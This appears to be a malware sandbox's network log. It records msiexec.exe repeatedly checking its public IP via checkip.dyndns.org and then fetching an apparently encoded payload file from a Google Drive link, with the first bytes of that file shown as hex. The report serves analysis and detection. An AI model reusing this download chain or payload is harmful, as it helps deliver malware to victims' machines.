                                                                                                            Date: Mon, 25 Nov 2024 12:47:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1d1209ff26a9b1dc42e42b9861518935
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.949896193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:50.557024002 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:47:51.699713945 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1c3439e5414245faa1727346661d81e1
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.949907193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:53.864502907 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:47:55.006190062 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1e9256c0f28220131d3dbdfeac3f0985
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.949915193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:57.303009987 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:47:58.452670097 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:58 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: e0fda265995584fc061a0ca17dd96139
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.949925193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:00.758322001 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:02.204852104 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 0361566d234a7dc12bd4fff05575bea4
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.949935193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:04.375278950 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:05.517107964 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 171c3f56e5617d5edaedf6243f029a36
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.949945193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:07.757415056 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:08.902054071 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:08 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 801976b768fc96dc1a7b32c51a882f44
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.949953193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:11.022012949 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:12.164453983 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 6e6298a24a9c70d51f39a0586b3b8965
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.949962193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:14.338361025 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:15.517761946 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: ba8067cbe89ee3fecb3cd173873f8fe8
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.949972193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:17.788270950 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:18.932955980 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 8ab8f36b382fafd443ac27ad8a0b5e8b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.949982193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:21.128218889 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:22.273792982 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: ba0aee04237918e0bab2dfd480c33789
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.949991193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:24.586792946 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:25.785875082 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 425ff835c6a37747acc30e601d69eb5b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.950000193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:28.016746998 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:29.166765928 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 0059c8857acfbd3a3e01d789c3cf0440
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.950009193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:48:31.760080099 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:48:32.912528038 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:48:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 72669b1029a91b4641db9dca90c95843
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.949838172.217.19.1744436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:30 UTC216OUTGET /uc?export=download&id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-25 12:47:31 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Mon, 25 Nov 2024 12:47:30 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'nonce-FJW6Y43zXalGnjxdIAdtzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.949848142.250.181.14436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:33 UTC258OUTGET /download?id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:35 UTC4911INHTTP/1.1 200 OK
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="LFLZxLHDbv221.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 63040
                                                                                                            Last-Modified: Mon, 18 Nov 2024 23:31:15 GMT
                                                                                                            X-GUploader-UploadID: AFiumC4W2RTVd9WDVyqgK1FNJ5pmYT8cvRPnwFRaL47vG0b18BrwdQ3qwzCPzgfs4JpkprT_A0U
                                                                                                            Date: Mon, 25 Nov 2024 12:47:35 GMT
                                                                                                            Expires: Mon, 25 Nov 2024 12:47:35 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=lgD8Zg==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2024-11-25 12:47:35 UTC4911INData Raw: 01 99 f5 82 c7 26 8c e9 1a 46 10 b2 95 ae f8 45 c2 5b 86 57 76 16 97 5f b5 44 f7 ee 16 3a 77 68 28 76 b1 0b f3 6a e3 75 49 fe ef 15 ba f3 0e ba 19 8e ab 84 34 53 23 25 a7 ab 92 2a 7e 7c af 92 67 77 01 2f 94 32 30 0f f0 1c b0 ed c1 51 ec d7 35 db b2 51 3f 49 bd 37 fb a2 c4 d8 37 8a 40 49 07 61 25 cf 3f 3f c7 32 90 42 af 98 51 aa ac a8 81 1f ee 3c 4d 2d 53 9b 4e 3d 2e 46 ef 06 9c 97 54 38 da cc e1 15 46 59 f0 dd 0d 96 fd 76 53 b4 d8 5c 42 38 61 6e 6c e5 bc 04 2e 92 8b 0b 40 2a 06 8d e7 3a 1e 47 bc 0e 4b 66 ff 44 50 1c 59 f3 95 00 99 a3 8c 0f 62 38 2a a4 08 6c 76 02 e7 b6 e5 20 d9 2b c3 58 14 1f 07 ba 48 5d fc 44 18 7e 73 45 a6 93 60 ad e6 f3 0b 83 7b f3 5e e8 d3 dc 58 11 ed 45 58 0c df 08 d3 50 3c 93 b8 5e c6 23 fc fb 22 35 ad b9 02 ee 5a 3d 3b 0e fe 85 79
                                                                                                            Data Ascii: &FE[Wv_D:wh(vjuI4S#%*~|gw/20Q5Q?I77@Ia%??2BQ<M-SN=.FT8FYvS\B8anl.@*:GKfDPYb8*lv +XH]D~sE`{^XEXP<^#"5Z=;y
                                                                                                            2024-11-25 12:47:35 UTC4876INData Raw: 97 0c e9 c3 6b df 49 bf 53 3c a2 de 20 98 a5 30 7b 04 85 98 9d 9a 07 d4 5e 68 80 dd 7e 67 c4 61 df 1f 1c d4 04 0a 62 d4 6f 2f 56 b1 d0 bc f8 32 02 b0 06 72 5b 0c cb 64 41 fe 9d e4 92 97 9c 1c 8b 9d a3 ff 87 49 1e f5 03 12 38 86 0f dd a3 fe 8b d2 54 c1 15 97 2d c0 3d da e7 c5 0f 5d df 8b e2 cc ef d6 5f 6c 75 a0 04 b1 1c 04 c2 ec 32 56 a7 d1 ae b7 60 2f 4c 12 b3 25 22 87 36 78 d5 df 91 90 76 7c 7f de 5d ba 93 a6 77 21 bc 04 43 01 ee 1e 33 fd f3 82 02 ef 1f 69 c3 b6 84 69 db 95 8c 46 d8 4f 71 31 b2 a9 3c 69 4e f0 c8 b8 c5 cb 9e 6c 03 3d c4 bc 15 76 59 bf ba c9 40 a3 dd 83 32 05 b1 1d 94 c7 5d 92 19 b6 21 21 7b 03 9f f3 ce 47 f5 ea c1 96 9a 8e ee aa fd 18 c4 a3 30 6e ad 65 c0 0b ce 3f 83 bb 63 e9 ed 8f f2 07 22 cc ad 55 1d eb e0 77 fa 96 53 9a 9b 7c 72 54 f7
